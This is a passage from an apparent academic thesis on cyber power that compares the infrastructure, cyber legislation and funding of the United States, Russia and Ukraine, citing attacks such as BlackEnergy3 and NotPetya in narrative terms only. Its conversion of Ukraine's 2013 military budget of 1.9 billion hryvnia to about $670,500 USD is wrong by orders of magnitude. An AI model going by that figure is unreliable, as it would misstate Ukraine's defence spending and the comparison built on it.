The Soviet Union used similar tactics through the Cold War such as, funding pro-
Communist groups and political parties in Western Countries, using media to promote causes that furthered a Soviet goal, and aiming to have some control over Western media.44 While the fall of the Soviet Union and greater integration with the west allowed much of the control the USSR sought to dissipate, the current Putin administration has revived the idea. Russia now has a larger reach to media and western states than the Soviet Union did. This reach is coupled with better technology and the ability to compete on the international stage, advocating for more than just survival.
A definition of hybrid war is offered, prior to its great prevalence within society by two
People’s Liberation Army officers in China. The book Unrestricted Warfare was written as a guide to militarily inferior states in a highly technological war against a larger adversary. The two authors predict “that non-war actors may be the new factors constituting future warfare…warfare which transcends all boundaries and limits.”45 Within this definition there is little that could not fall under hybrid warfare because it can include any acts to subvert, spy, dissuade and so on. However,
Unrestricted Warfare, which has many parallels to hybrid warfare, includes any type of warfare,
43 Historical texts such as: Mao Zedong, On Guerrilla Warfare (Washington D.C.: Department of the Navy, 1989). AND Flavius V Renatus, “De Re Militari,” Ed. by John Clarke, Digital Attic, Accessed October 4, 2017, www.digitalattic.org/home/war/vegetius/ for two examples of how hybrid warfare was used previously, prior to the technological boom of today. These manuals focus on multiple tactics and different methods to be used in tandem when fighting to ensure a victory on multiple levels of the PMESII spectrum. 44 Christopher S. Chiwis, “Understanding Russian ‘Hybrid’ Warfare’ and what can be done about it,” RAND Corporation, US House of Representatives (March 22 2017) 7. 45 Qiao Liang and Wang Xiangsui, Unrestricted Warfare, Beijing, PLA Literature and Arts Publishing House (February 1999) 2. 28
traditional, hybrid and strictly technological. Thus, Unrestricted Warfare and Hybrid Warfare cannot be said to be the same thing.
With definitions housed in domestic legislation and lacking throughout international legislation, each definition can be warped to fit state needs. It is through legislation and semantics that states allow themselves to partake in cyberattacks, and it is through legislation and semantics that states protect themselves from repercussions of carrying out a cyberattack. The definitions used in this thesis are more similar to descriptive adaptations of legislation from around the globe.
These definitions and distinctions are unlikely to be agreed upon by any state in the international community or to be generally adopted.
29
3 DISTRIBUTION OF CYBER POWER
Disproportionate cyber capabilities between large and small states is the hallmark of what makes cyber a contentious new domain. The cyber domain is dynamic, changing rapidly and requires states to have constant development and improvement in technologies and tactics to remain in a position of power. Any state that has impending problems in cyber, such as lack of funding, lack of human capital, lack of resources and/or lack of training among the population are unable to defend themselves through active cyber defense and must rely on fortifying their systems in the event of an attack. With such radical and dynamic changes, only states that can fund research and development in those areas will be able to vie for dominance and increase their ability to protect themselves from threats.
The United States holds a dominate power position, with systems to advance technology, a strong leadership role in international regulations and legislation, and is able to fund many groups to create faster, more reliable systems. The United States is often seen as the pinnacle of modern technological advancement, with a firm grasp on international power. It is no different in the cyber domain. Russia has infrastructure to advance technologies, to develop highly trained personnel, the ability to manipulate international legislation in their favor, and has funding to allow such advances. Conversely, Ukraine has a lack of non-Soviet infrastructure for technological advancement; was, at the beginning of the Maidan Revolution, lacking a functional military, police service and government; is not privy to the same international organizations as the United States and Russia and therefore has little say in international legislation on cyber; and lacks funding to bolster such programs to the degree needed.
By understanding the capabilities of different states, it is easier to understand why Ukraine remains at such a significant disadvantage in the Ukrainian Crisis. It seems obvious that there must 30
be a change in how smaller states protect themselves from larger adversaries. While states such as the United States and Russia can defend themselves through active cyber defense and have readily available response teams for such events, small states such as Ukraine lack the infrastructure, the legislation and the funding to implement such programs, let alone the ability to gain the upper hand in the cyber domain.
This section of the thesis will expound upon what infrastructure, influence and financial support the United States, Russia and Ukraine can use to their advantage. The stark contrast between the capabilities of the United States, seen as the leader in cyber capabilities, and Ukraine is used to highlight the significant underdevelopment of Ukrainian cyber capabilities and the lack of technological advancement. A comparison between the United States and Russia is used to explain how Russia is a leader internationally of the fight against the United States power over cyber and how that could impact smaller states that rely on the dominance of the U.S. The comparison between Russia and Ukraine is used to highlight the significant gaps between the two countries’ infrastructure, legislation and funding for cyber capabilities as well as highlight the reliance of Ukraine on foreign aid when compared to Russia.
3.1 Infrastructure
Infrastructure is a key factor in who can exercise power over the networks. Infrastructure is the first of the three power structures because of the interplay of infrastructure with the other power structures. The states with stronger technological infrastructure can lead the way in advancement and implementation. States that hold more infrastructure in the public or private sectors are able to hold more power to influence subsequent legislation. The states that can remain ahead in technology are less likely to be crippled at a state level than a state that does not have the infrastructure to defend or fight back. For infrastructure to remain current and advancements to 31
happen rapidly, each state must allocate enough funding to cyber capabilities. Power can be built on the presence of infrastructure; therefore, usable infrastructure must exist for power to manifest.
United States Power.
The majority of Internet system providers, such as Cisco and Microsoft, are U.S. companies. Most of the largest Internet-based applications used worldwide, such as Google, Facebook and
YouTube, are headquartered in the United States. The United States government relies on infrastructure provided by the private sector, so it has a vested interest in helping protect it.46
The production of technology assets also facilitates influence over who best controls hegemony within cyber. Many parts of technological systems, such as computer chips or motherboards, are produced outside of the United Sates. To continue U.S. hegemony over the cyber domain, a balance of friendly cooperation and trade must ensure the continuance of technological services within the United States. By producing parts of technology overseas the
American service industry can continue to provide protection, consulting and training, among other services. This would continue to protect the U.S. economy and protect the very systems that allow the cooperation. However, this binds the United States to specific actions regarding trade in the technological sector and a balance between cooperation and willingly giving protected information to adversarial states. This balance has become a problem in the past, such as when cooperation between Microsoft and China ended with the Chinese computer scientists taking the source code provided under the guise of friendly cooperation was used to develop malicious code, viruses and backdoors that could be exploited in future situations.47 This cooperation resulted in the hacking of the United States Pacific Command Headquarters, causing serious ramifications for
46 William J. Lynn III, “Defending a New Domain: The Pentagon’s Cyberstrategy,” Foreign Affairs 89, 5 (2010): 100. 47 Panayotis A. Yannakogeoros, “Internet Governance and National Security,” Strategic Studies Quarterly 6, 3 (2012): 108-109. 32
the U.S. military and its networks.48 Losing American intellectual property has a ripple effect within the U.S. as “military strength ultimately depends on economic vitality.”49
However, much of the United States electronic information is housed on computers that are infected with the same vulnerabilities as computers owned by ordinary civilians. Since government uses applications such as Internet Explorer or Word, their computers are often vulnerable to the same attacks as civilian computers. While some computers operate on the Secure
Internet Protocol Router network (SIPR) and have additional security through connections to different security domains, computers that house unclassified or sensitive but unclassified information operated on the same networks as civilian data through the Non-Classified Internet
Protocol Router network (NIPR). These computers are vulnerable to attacks as well as attacks from other networks because officials can check personal email, log into Facebook and browse other websites that host malware. The computers that run on classified domains are often placed behind different security protocols such as ID scanners with personal PINs and devices are locked with password protection. However, this is not always the case, and some classified domain computers are in unsecured areas, creating vulnerabilities in the physical protection of classified information.
These vulnerabilities, especially the use of zero-day exploits, motivates the United States to be careful about the flow of information and the protection afforded their classified information.
Paradoxically, the states with the most technological infrastructure and the strongest securities protecting that infrastructure are the most attacked.50 The most common targets are often the states that boast the most sophisticated cybersecurity systems and rely the most heavily on cyber assets to ensure the continued management of the state due to the high reward of a successful
48 Yannakogeoros, “Internet Governance and National Security,” 109. 49 Lynn, “Defending a New Domain,” 100. 50 International Telecommunication Union (ITU), “Global Cybersecurity Index 2017,” ITU, 6 July 2017. 33
attack. In 2018 the United States was the most targeted state for cyberattacks, including both cybercrime and cyber espionage attacks.51 Despite these continuous attacks, the impact of such attacks is minimized by consistent investment of funds and resources in cybersecurity infrastructure. U.S. military spending exceeds other states around the world and, while cyber is only a small amount of the budget, it is significant when compared with other states’ cybersecurity programs. The United States government also pays for Cyber Response teams that are integrated into higher education institutions so research and development can proceed quickly. Analysts and cyber specialists are in all government levels, at companies, and throughout police departments.
Russian Power.
Russia has emerged as a major player on the international cyber stage. Russia has a unique advantage when it comes to the cyber assets’ infrastructure due to the wide expanse of the former
Soviet Union and the remaining Soviet infrastructure still in use in most post-Soviet states. Many of Russia’s adversaries are located in close geographic proximity and were Soviet Socialist
Republics so the majority of infrastructure in these states is closely tied to Russia’s infrastructure.
Communications companies are usually subsidiaries of a Russian parent company, systems for the electrical grids are based on a Soviet model, and a large number of military infrastructures are remnants of the former Soviet Union. These states, following the fall of the Soviet Union, were largely in poverty and focused on utilizing the existing infrastructure rather than rebuilding from the ground up. Such was the case in the Georgian cyberattacks, where DDoS attacks were used to disrupt communications between Georgian military forces.52 This tactic was also used in the
Ukrainian Crisis and this was achieved relatively easily due to the Russian superiority over former
51 Control Risks, “Cyber Security Monthly,” 08 November 2018. 52 "Marching off to cyberwar," The Economist, 6 May 2009. https://www.economist.com/technology- quarterly/2008/12/06/marching-off-to-cyberwar 34
Soviet states’ technological asset production and services. By creating a demand for Russian products, the Kremlin can exploit them or retrieve information stored on the devices without needing permission due to the monopoly they hold over the systems. The Russian government continues to work with these companies to ensure this ongoing information exchange. Russian communications networks are so heavily relied on in Post-Soviet states that even the United States diplomats must use Russian provided services for official communication.53
Perhaps the most documented cyberattacks in recent history have been those perpetrated by the Russian government. Their wide breadth of capabilities and their ability to use those capabilities on the international stage that has assured Russia cannot be ignored when cyber is being discussed. In 2007, Estonia’s networks were shut down by a Distributed Denial of Service
(DDoS) attack.54 The attack was attributed to Russia as a retaliatory attack following the removal of a Soviet era statue from a public square. While Russian use of cyberattack is generally looked at as an undemocratic use of network interconnectedness, the strategy has been successful throughout the past decade with little intervention in the attacks. By using the Internet to launch attacks, attacks reminiscent of soft power, Russia has shown themselves to be a major player, unable to be ignored and has therefore gained an advantageous position in the creation of, or lack thereof, international cyber standards and policy. While there has been international pressure from the West, Russia has been strategic in their actions, using cyber to influence other states rather than cause an international incident through cyber. The attacks Russia has used in the past all fall outside the scope of cyberwarfare and most commonly fall within cyber espionage, which is less likely to illicit a retaliatory response.
53 This is known from the author’s personnal experiences. 54 Damien McGuinness, “How a cyber attack transformed Estonia,” BBC, April 27, 2017. https://www.bbc.com/news/39655415 35
Ukrainian Power.
When Ukraine became independent from the Soviet Union in 1991, they were already at a disadvantage because advancements away from Soviet Union companies and technologies never happened, leaving their industrial and technological complex integrated with Russia, housed in
Soviet infrastructure. Much of the telecommunications infrastructure was owned by Russian companies and much of the information flowing into Ukraine was from Russian media sources and news outlets. Leading up to the Maidan Revolution there was little consideration or even the possibility of removing the deeply integrated Russian systems from the infrastructure within
Ukrainian state borders. The already contentious relationship between ethnically Russian
Ukrainians and ethnically Ukrainian Ukrainians limited the Ukrainian government’s ability to remove Russian sourced media from the newly autonomous state due to fear of retribution. The infrastructure of Ukraine is largely vulnerable to attacks from Russia because it is still uses old
Soviet systems or was upgraded with new technologies sourced from Russia. Even as the war in
Donbas has continued, there has been an inability to remove Russian technologies, communications companies parented by Russia, and Russian sourced media from within the state.
Any desire by the government to do so ignites protests in the predominately Russian speaking provinces and gives the Kremlin further propaganda material.
3.2 Legislation
Much like a large military can influence how states interact, dominance in the cyber domain influences behavior. Such actions have been undertaken recently by Russia. The Ukrainian Crisis and the strong divide between the ethnically Russian and ethnically Ukrainian populations is one example of how information warfare is an important part of state power. The influence of Russia on the United States 2016 presidential election has caused repercussions beyond the election result 36
and still consumes the current White House administration, the media and the general public.
Having power over influence in the cyber domain is not so different than having military power because it can be used to manipulate a target state.
Domestic legislation is important for responding to cyberattacks, and the varying levels of legislation is indicative of the preparedness of a state. Cyberattacks have occurred for nearly as long as the Internet has been public and a state that is focused on legislation is more likely to have had their defenses tested and has a higher level of training and preparedness in place to deter, delay, prevent and deescalate a cyberattack. Having a voice in international legislation is crucial to states’ use of cyberattacks and hybrid warfare.
Legislation has a large impact on how states use and control the Internet. Currently the largest governing body for the Internet is the Internet Corporation for Assigned Names and
Numbers (ICANN), created under U.S. legislation and with U.S. oversight.55 With rapid technological advancement, the next Internet governance direction is likely to sway cyber power away from the United States towards the state in which it was created. Already, states such as
China that maintain domestically created alternatives for popular platforms, have an advantage in gaining a seat at the table for international discussions on protocols and standards within the cyber domain.
Any significant new technologies will give the state in which they are housed a larger role in how to manage the interconnectedness of the Internet as their influence grows. Already the
United States is losing its hold on Internet hegemony as an initiative, led by Russia and China, is pushing against the U.S. dominance of ICANN Internet governance.56 Brazil, South Africa and
55 Jonathan Weinberg, “ICANN and the problem of Legitimacy,” Duke Law Journal 50, 1 (2000): 206. 56 Yannakogeoros, “Internet Governance and National Security,” 115. 37
India have all been vocal opponents of U.S. power over cyber, partnering with Russia and China to move Internet resources away from the U.S. and towards a multilateral body.57 Not only has
Russia been able to monopolize communication services in Post-Soviet states, Russia has been able to use the lack of internationally agreed upon definitions to their advantage. Since there is a lack of international legislation focused specifically on what constitutes valid Internet usage and protections around cybercrime and cyberattack, the Kremlin is able to deploy cyberattacks that fall within the grey area of international law and human rights agreements that have been used to regulate cyber.
With the fight for hegemonic control of Internet standards each state is engaged in a standoff, actively trying to gain competitive advantage for their state while simultaneously engaging in collaborative discussions marred by low trust and high stakes.
Even if Russia has not emerged as the leader in Internet standards, the focus on creating a technologically educated population, as well as dominating cyber technologies and communication structures has allowed Russia a place in the elite few that can strongly challenge
U.S. cyber hegemony.
In comparison, Ukraine has minimal to no say over network standards. First and foremost, small states rarely have a say on the outcomes of network standards and protocols. These aspects are largely controlled by the United States, with very few other states able to challenge their hegemony. Negotiating for better network access and more beneficial standards and protocols has not been a priority of the Ukrainian government, even in the advent of the Ukrainian Crisis. Marred
57 Yannakogeoros, “Internet Governance and National Security,” 117. 38
by old technologies and corruption, Ukraine severely lacked, and continues to lack, a seat at the table to influence international network regulations.
We now explore specific legislation in the United States, Russia, and Ukraine to understand the specific strengths and opportunities available to these three key players. The United States has the longest, most comprehensive domestic legislation for cyberattacks and technological advances.
Domestic legislation for the United States is largely focused on the protection of information and technology, and the advancement of infrastructure surrounding the protection of United States networks. Comparatively, Russian legislation is mainly housed within military doctrine and is focused on simplifying cyberattacks and hybrid warfare to allow for broad generalizations and personal interpretations of the law. Compared to the United States, Russian legislation is heavily focused on offense. Internationally, Russia is fighting the United States for hegemony over legislation to ensure their offensive posture can be continued. When comparing Ukraine with both the United States and Russia, the amount of domestic legislation, the international influence exerted, and the ability for Ukraine to combat cyberattacks with offensives of their own dwarfs in comparison. Ukraine is at a vast disadvantage against its adversaries and data-driven cyber prediction can be incredibly beneficial to the defensive plight of a handicapped state.
United States Legislation.
Not only is the United States fighting for international hegemony, they are also having to fight to keep pressure on the domestic laws and regulations in other states, so those policies align with their interests because of “the interconnected nature of the internet…domestic policy, the actions of domestic firms and non-state actors can have significant negative externalities.” 58 Since cyber
58 Mark Raymond, “Engaging Security and Intelligence Practitioners in the Emerging Cyber Regime Complex,” The Cyber Defense Review 1, no. 2 (2016): 82. 39
is rapidly changing and effects within the cybered sphere are nearly instantaneous, domestic cyber legislation is an important consideration when looking at the disproportionate power of large states compared to small states. States such as the United States have a distinct advantage due to a long history with the Internet and interconnected technologies.
Early on in its creation, the Internet was centered around U.S. military communication.
Therefore, the technology and its subsequent growth was largely housed within the United States and led to the creation of U.S domestic legislation on computers and cybersecurity prior to its creation in other states.
In 1981 the Department of Defense Computer Security Center was founded as a subsidiary of the NSA, becoming the National Computer Security Center (NCSC) in 1985. This Center worked with agency partners to “promote research and standardization efforts for secure information about issues surrounding secure computing,”59 and to “encourage the widespread availability of trusted computer systems for use by those who process classified or other sensitive information.”60 Further, the NCSC worked with the Trusted Product Evaluation Program (TPEP) which tests “security features of commercially produced and supported computer systems,” and
“evaluates the protection capabilities against the established criteria presented in the Department of Defense Trusted Computer System Evaluation Criteria.”61 The Department of Defense Trusted
Computer System Evaluation Criteria aim “to address computer security issues…under the leadership of the National Bureau of Standards (NBS)” as well as “provide DoD components with a metric with which to evaluate the degree of trust that can be placed in computer systems for the
59 Margaret Rouse, “National Computer Security Center (NCSC),” Securesearch, April 2010. https://searchsecurity.techtarget.com/definition/National-Computer-Security-Center 60 Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD). 7. 61 National Computer Security Agency, Trusted Product Evaluation: A Guide for Vendors (Washington D.C.: GPO, 1990): i. 40
secure processing of classified and other sensitive information,” and “provide a basis for specifying security requirements.”62 These criteria and centers address the need for securitizing computers and were created for both commercial manufactures as well as for government systems.
In 1986, Public Law 99-474, known as the Computer Fraud and Abuse Act, was passed to provide protection against “the use of the computer to intentionally access a Federal interest computer without authorization” and “[whoever] knowingly and with intent to defraud, access a
Federal interest computer without authorization, or exceeds authorized access, and by means of such conduct further the intended fraud.” 63 This act is the first to specifically address the insecure nature of cybersecurity through federal legislation. This put the United States in the unique position of having some of the first legislation on cybersecurity and coincided with the beginning of the state’s prevalence in the international community.
The first computer worm was created and wreaked havoc on U.S. computer networks, which led to the creation of the Computer Emergency Response Team (CERT) at Carnegie Melon, thereby establishing a “partner with government, industry, law enforcement, and academia to advance cybersecurity and improve the security and resilience of computer systems and networks.”64 Following the Morris worm the government passed the 1996 Health Insurance
Portability and Accountability Act (HIPAA), regulating health privacy and the 1999 Gramm-
Leach-Bliley Act (GLBA), regulating security in the financial sector. The United States was working to protect critical infrastructure at the federal level through those acts and continued to protect the main areas of socio-economic vulnerability by passing Public Law 107-296 following
62 Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD): 7-8. 63 99th Congress. H.R. 4718: Computer Fraud and Abuse Act of 1986. United States Congress: GPO, 1986. https://www.govtrack.us/congress/bills/99/hr4718/text/enr. Section 2. Subsection D. Article 5. 64 Carnegie Mellon University. “Software Engineering Institute: History,” Last updated 2018. https://www.sei.cmu.edu/about/divisions/cert/index.cfm#history 41
the attacks on 9/11, focused on the protection of infrastructural information and the specifications for sharing such information over unsecured channels.65 Public Law 107-296, also known as the
Homeland Security Act, housed the first Federal Information and Security Modernization Act, known as the Cyber Security Enhancement Act of 2002.66 The Department of Homeland Security
(DHS), absorbed the majority of organizations aimed at protecting United States cyberspace and its hegemony in cyberspace.67 In 2003 the Federal Computer Incident Response Center (FedCIRC) was moved under DHS authority and renamed to US-CERT, which was similar to the institution
Carnegie Melon had created in 1988 following the Morris worm. These federal institutions operated to look for cybersecurity vulnerabilities and work to thwart new threats before, or as soon as, they appeared while simultaneously working towards upgrading the network technology in use.
Russian Legislation.
Russian domestic cyber policy is perhaps the most internationally influential domestic policy within this realm of security. Domestic policies inform the majority of its cyber activities, even on an international scale, and is sufficiently vague to allow for a broad interpretation of how cyber can be used against adversaries. In 2007, the Russian Ministry of Defense approached the United
Nations with concerns over information campaigns, positing that “an information campaign directed by one country against another could under some circumstances be classified as aggression and therefore was illegal under the UN Charter.”68 However, because the United States largely held a monopoly on influence in cyberspace at this point, the United States delegation created an information security resolution in 2008 that declared “existing international law could
65 “Public Law 107-296: To Establish the Department of Homeland Security, and for other purposes.” 66 107th Congress. “Public Law 107-296: To Establish the Department of Homeland Security, and for other purposes.” 25 November 2002. https://www.dhs.gov/sites/default/files/publications/hr_5005_enr.pdf 67 US-CERT. “About Us.” Last updated 30 September 2016. https://www.us-cert.gov/about-us 68 Tom Gjelten, "Shadow Wars: Debating Cyber "Disarmament',” World Affairs 173, No. 4(2010): 36. 42
theoretically be applied to cyber conflict.”69 Following this, the Russian Federation changed its strategy towards cyberspace and outlined in its 2010 Military Doctrine its change to coordination and execution of information warfare aiming at updating the force into a modern, highly mobilized fighting force.70 This change in military doctrine effectively makes all Russian interference military decisions. Russian interference over open source platforms, such as Twitter and Facebook, while not illegal, and only loosely included in our definition of information warfare, would also be considered military decisions based on the 2010 Doctrine. By using military doctrine, Russia is closely integrating their cyberspace and military capabilities, which is likely to give them an advantage throughout the domain.
Another disparity between approaches rests on key definitions and, specifically, the inability for states to agree on internationally acceptable definitions. With the lack of an international consensus on cyber definitions, states are able to determine their own definitions that work most effectively to advance their own state goals. For instance, “Russian military theorists do not generally use the terms cyber or cyber warfare. Instead they conceptualize cyber operations within the broader framework of information warfare.”71 The Russian approach to definitions of components within cyberspace is just one of the many state approaches that makes it difficult to create specific international legislation surrounding these issues after the state legislation has already been established.
Ukrainian Legislation.
69 Gjelten, "Shadow Wars,” 40. 70 Azhar Unwala and Shaheen Ghori, “Brandishing the Cybered Bear: Information War and the Russia-Ukraine Conflict,” Journal of the Military Cyber Professionals Association 1, No. 1 (2015); 1-11. 2. 71 Connell and Vogler. “Russia’s Approach to Cyber Warfare.” 43
In contrast to these powerful states, Ukraine has lagged in cyber legislation and cyber defenses.
Leading up to the Ukrainian Crisis there was little, if any, consideration of cyber security in
Ukraine. The Criminal Code of Independent Ukraine in 2001 did add considerations of cybercrime in Article 163 on the “violations of mail, telephone communications, telegraph and other correspondence…via computers” and Chapter 16, “Criminal offenses against computers, computer systems and networks.”72 In Ukrainian legislation until 2013, the term cyber was rarely used. It was mentioned for the first time in Law of Ukraine “On Fundamentals of National Security of Ukraine,” introduced in 2003, as a single bullet point of Article 7, “Threats to National Interests and Security.”73 In other legislation, the term cyber is not used, but computer and attacks against computers are mentioned, although in limited terms: The Law of Ukraine “On Legal Regime of a
State of Emergency” (2000) and “On the Legal Regime of Martial Law” (2000) computers and computer networks are mentioned as a place to seek protection and to enforce rule of law.74 Law of Ukraine “On Intelligence Services” (2011) deals with computers and information obtained by legitimate law enforcement officials but not privacy on a grand scale.75 Law of Ukraine “On the
Fight Against Terrorism” (2011) mentions computers and technological terrorism as a part of the definition of terrorism, but offers no distinct path through which to respond to, or be proactive against, technological terrorism.76 Further, the Ukrainian government has laws in place regarding
72 “Criminal Code of Ukraine.” Verkhovna Rada: September 1, 2001. https://www.imolin.org/doc/amlid/Ukraine_Criminal%20Code%202001.pdf 73 “On Fundamentals of National Security of Ukraine,” No. 964-IV with changes introduced by Laws N 3200-IV of 15.12.2005, N 3411-VI of 01.07.2010. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf 74 “On the Legal Regime of Martial Law,” 1647-III including changes made by No. No 662-IV of 03.04.2003, BVR, 2003, No 27, p. 209; No. 803-VI of 25.12.2008, BVR, 2009, No 19, p. 258; No. 1836-VI of 21.01.2010, BVR, 2010, No 12, p. 119; No. 2592-VI of 07.10.2010, BVR, 2011, No 10, p. 63. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf 75 Ibid. 245. 76 “On the Legal Regime of Martial Law,” 1647-III including changes made by No. No 662-IV of 03.04.2003, BVR, 2003, No 27, p. 209; No. 803-VI of 25.12.2008, BVR, 2009, No 19, p. 258; No. 1836-VI of 21.01.2010, BVR, 2010, No 12, p. 119; No. 2592-VI of 07.10.2010, BVR, 2011, No 10, p. 63. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf. 260. 44
confidential communication but these laws are vague on definitions and implementation across a wide variety of mediums.77
Following the Maidan Revolution and the Annexation of Crimea, the Ukrainian government aimed to take a more comprehensive look at cybersecurity. The National Security
Strategy of Ukraine was adopted on May 26, 2015, and aimed to “minimize threats to state sovereignty, and create conditions for restoration of territorial integrity of Ukraine…and secure a
European future.”78 The Strategy mentions cyberattacks as an “acute threat” within the larger category of information threats.79 The Information security policy (4.12) states that “setting up a cybersecurity system including coordination of efforts in countering cyberterrorism, protection against cyberattacks on critical infrastructure, predominately in the military, energy, transportation, telecommunications and banking spheres” is a priority.80 This policy further states
Ukraine’s adherence to international practice of cybersecurity and intentions to work towards implementing policies under NATO and the EU.81 This document was created prior to the largest infrastructural attacks, but had no specific cyber defense measures put into place leading up to
BlackEnergy3/KillDisk, the first major attack against the Ukrainian industrial complex.
Legislation within Ukraine was largely absent surrounding cybersecurity until it had to be implemented during wartime. It was not until after the BlackEnergy3/KillDisk attack against critical infrastructure that the Ukrainian government adopted a National Cyber Security Policy, by
77 “On the National System of Confidential Communication,” 2919 II I of 10.01.2002 including changed made by No. 1280-IV of 18.11.2003, BVR, 2004, No. 12, p. 155; No 2599-IV of 31.05.2005, ВVR, 2005, N 26, p. 349; No 879-VI of 15.01.2009, ВVR, 2009, N 24, p. 296. Kyiv, Ukraine: 2002. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf 78 National Defence and Security Council, “National Security Strategy of Ukraine,” http://www.niss.gov.ua/public/File/2015_analit/strategiya_2015.pdf 79 Ibid. 6. 80 Ibid. 23. 81 Ibid. 45
presidential decree in February 2016.82 The strategy outlined the main areas of focus to ensure cybersecurity in Ukraine and is based on the Convention on Cyber Crime, ratified by Ukraine on
7 September 2005 and legislation of Ukraine on national security, domestic and foreign policy, electronic communications, and protection of state information resources.83 The Strategy names the “ongoing aggression of the Russian Federation, and other fundamental changes in the external and internal security environment of Ukraine” as requiring “the immediate establishment of a
National Cyber Security System as an integral part of the National security of Ukraine.”84 The main areas of the strategy are “developing a safe, sustainable and reliable cyberspace,” revamping
“cybersecurity of the government electronic information resources,” improving and developing critical infrastructure cybersecurity, “developing cybersecurity capabilities in the defense sector” and training to fight cybercrimes.85 This strategy includes not only a means to combat cyberattacks perpetrated for political and national security interests, but also for cybercrimes, perpetrated by third parties, not backed by political or security motives, and not operating for a foreign power and differentiates between ‘Cyberthreats of military nature,’ ‘Cyber espionage,’ ‘Cyber terrorism’ and
‘Cybercrime.’ This strategy, although implemented in 2016, is part of the steps to implement
Ukraine’s National Security Strategy.86
In June 2016 the National Cybersecurity Coordination Center was created under the
National Cybersecurity Strategy as part of the National Security and Defense Council.87 This center has “a supervising function and undertakes tasks related to analyzing the state of national
82 Presidential Decree of Ukraine. “Cyber Security Strategy of Ukraine,” No. 96/2016. 15 March 2016. 83 Ibid. 84 Ibid. 85 StratComUA. “Cybersecurity Strategy of Ukraine.” 86 Presidential Decree of Ukraine No. 287, 26 May 2015. 87 UNIAN. “Ukraine Create National Center for Cybersecurity,” June 8, 2016. https://www.unian.info/society/1369157-ukraine- creates-national-center-for-cyber-security.html 46
cybersecurity and its preparedness for combating cyber threats as well as forecasting and detecting relevant potential and actual threats.”88 This body deals with both insider and outsider threats, and aims to limit cybercrime as well as cyberattacks. The Center has “taken lead on enforcing a rapid response protocol together with other actors that allow stopping further spread of the malware.”89
This body coordinates with other branches of law enforcement, including the Cyber Police, as well as foreign governments that have assisted Ukraine with cyberattacks.
The cybersecurity strategy of Ukraine, however, does not address the problem of attackers accessing smaller companies to carry out an attack against larger targets, and their protections that had been set in place since the 2015 and 2016 attacks were breached. Further, there were similarities in the codes of the BE3/KillDisk, CrashOverride/Industroyer and the NotPetya attacks, calling into question the effectiveness of the implementation of the Ukrainian cybersecurity strategy. Ukraine is continuing its movements forward on important cyber defense projects, but the success of the Ukrainian cybersecurity program largely hinges on Western states’ expertise and assistance. Historically, it has been the United States that has helped in the aftermath of cyberattacks, with technical expertise and the export of services, after both BlackEnergy3/KillDisk and CrashOverride/Industroyer. The United States continues to assist Ukraine in their cybersecurity endeavors, as is evidenced by H.R. 1997, the Ukraine Cybersecurity Cooperation
Act of 2017, which passed the House of Representatives on 8 February 2018. This bill seeks to reaffirm cybersecurity cooperation and the Charter on Strategic Partnership between the United
88 Global Forum on Cyber Expertise, “Cybersecurity in Ukraine: National Strategy and International Cooperation,” June 7, 2017. https://www.thegfce.com/news/news/2017/05/31/cybersecurity-in-ukraine 89 Leo Streltsov, “The System of Cybersecurity in Ukraine: Principles, Actors, Challenges, Accomplishments,” Eur J Secur Res 2 (2017): 159. 47
States and Ukraine, as well as assist in the continuance of an open the internet and reducing
Ukrainian reliance on Russian telecommunications systems and infrastructure.90
3.3 Funding
Ukraine is at a significant disadvantage due to a lack of funding for cyber in addition to a shortage of other military technology. States able to provide more funding to their cybersecurity programs are going to be able to provide a higher quality of cyber defense for the state. The following considers the relative differences between the United States, Russia, and Ukraine with respect to funding.
United States Funding.
The United States Federal budget for fiscal year (FY) 2019 includes $15 Billion USD for cybersecurity related activities. Additional funding is also allocated, but a number is not provided due to the sensitive nature of the activities.91 Seventy-six United States civilian agencies, including the DoD, have a budget for cybersecurity in FY 2019 under the federal budget.92 Those numbers, which do not include specific agency spending regarding their own network security, reflect the funding aimed at creating programs and initiatives that serve a “broader cybersecurity mission”.93
The United States has a task force and multiple departments tasked with protecting information and technology within the cyber domain. Many international corporations boast large teams of information engineers and cybersecurity experts with the sole purpose of protecting the company’s proprietary information.
90 H.R. 1997. “Ukraine Cybersecurity Cooperation Act of 2017,” Senate of the United States, February 8, 2018. 91 Section 630 of the Consolidated Appropriations Act, 2017 (Pub. L. No. 115-31) amended 31 U.S.C. § 1105 (a) (35). 273 https://www.whitehouse.gov/wp-content/uploads/2018/02/ap_21_cyber_security-fy2019.pdf 92 Ibid. 93 Section 630 of the Consolidated Appropriations Act, 2017. 273. 48
Russian Funding.
Russia is the third largest spender on military following the United States and China, spending
4.88 trillion rubles,73.47 billion USD (in today’s conversion), in 2018 on defense and security, which is a 17 percent increase over the previous 5 years.94 This number is most likely not a complete accounting of total expenditure for the Russian military-industrial complex since military expenditure is also housed within the expenditure of different organizations and not reported as national defense.95 A 2018 report attempted to compile Russian spending on cybersecurity, and determined that they spend approximately $300M USD and have around 1,000 cybersecurity specialists that act as offensive troops.96
Ukrainian Funding.
In stark contrast, the Ukrainian military budget in the year 2013, the beginning of the Maidan
Revolution, totaled 1.9 billion Hryvnia (UAH), the equivalent to approximately $878,700 CAD or
$670,500 USD. This budget included all aspect of the military complex.97 While no specific numbers are available on the exact amount spent on cybersecurity uniquely, the entire budget for the defense of Ukraine was less than the lowest amount given to any one of the United States civilian agencies in the FY2019 budget for cybersecurity alone. The defense budget grew
94 “Бюджет России на 2018 год: чем будут наполнять и на что тратить,” Деловая жизнь bs-life.ru http://bs- life.ru/makroekonomika/budzet2018.html 95 Vladimir Jushkin, “What is Hidden in Russia’s Military Budget?” Stockholm International Peace Research Institution 25 May 2018. https://icds.ee/what-is-hidden-in-russias-military-budget/ 96 “Russia among top 5 countries with highest cyber security budget,” Sputnik News, 1 October 2017. https://sptnkne.ws/dm32 97 Ruslan Rudomsky, “Как изменились Вооруженные силы Украины за 25 лет?” Depo News, 6 June 2016. https://www.depo.ua/rus/war/yak-zminilis-zbroyni-sili-ukrayini-za-25-rokiv-06122016110000 49
following the annexation of Crimea and the subsequent war in Donbas to ₴64.247 Billion UAH in
